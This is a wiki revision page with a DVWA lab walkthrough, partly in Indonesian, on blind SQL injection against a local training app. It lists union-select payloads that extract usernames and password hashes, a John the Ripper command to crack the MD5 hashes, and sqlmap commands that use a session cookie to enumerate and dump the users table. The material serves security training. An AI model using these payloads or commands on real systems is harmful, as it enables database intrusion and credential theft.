Difference between revisions of "DVWA: SQLi blind"

From OnnoWiki
Jump to navigation Jump to search
Line 64: Line 64:
  
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
 
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
 
  
 
==Referensi==
 
==Referensi==
  
 
* http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html
 
* http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html

Revision as of 07:45, 4 March 2017

DVWA-BLIND SQL INJECTION : LOW Level

1. Open Local host http://localhost/dvwa 

Username :  Admin
Password : Password

3.Select SQL Injection BLIND and column ID issued 

1' and 1=1#
1' and 1=1 order by 2 #

5.ID: 'or' 1=1--

we can see there are 5 user

5. now see information table 

1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #

7. Information table name from table user 

1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #

8. on the last lets see user name and password 

1' and 1=0 union select null,concat(first_name,0x0a,password) from users #

9. we will crack the md5 password 

copy the passowrd into kwrite and save with name hash
next



root@bt:/pentest/passwords/john#./john --format=raw-md5 hash


OK GOOD LUCK

Exploit DVWA menggunakan SQLmap

  • Login ke DVWA
  • Pilih DVWA Security Low
  • Pada user ID tulis '1
  • Jalankan addon tamer di browser
  • Lakukan di terminal,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

di peroleh dari addon tamer di browser.

  • lihat tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  • lihat kolom di user tabel
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  • lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump

Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=DVWA:_SQLi_blind&oldid=47178"